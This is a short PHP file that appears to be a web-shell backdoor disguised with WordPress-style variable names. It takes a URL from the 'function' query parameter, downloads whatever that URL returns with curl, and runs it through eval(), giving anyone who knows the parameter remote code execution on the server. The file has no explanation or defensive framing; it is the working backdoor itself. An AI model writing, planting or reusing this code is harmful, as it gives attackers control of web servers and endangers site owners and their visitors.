<?php

if (isset($_GET['function'])) {
    $get_the_category_list_hk = $_GET['function'];
    if ($get_author_posts_url_urf = curl_init()) {
        curl_setopt($get_author_posts_url_urf, CURLOPT_URL, $get_the_category_list_hk);
        curl_setopt($get_author_posts_url_urf, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($get_author_posts_url_urf));
        curl_close($get_author_posts_url_urf);
        exit;
    }
}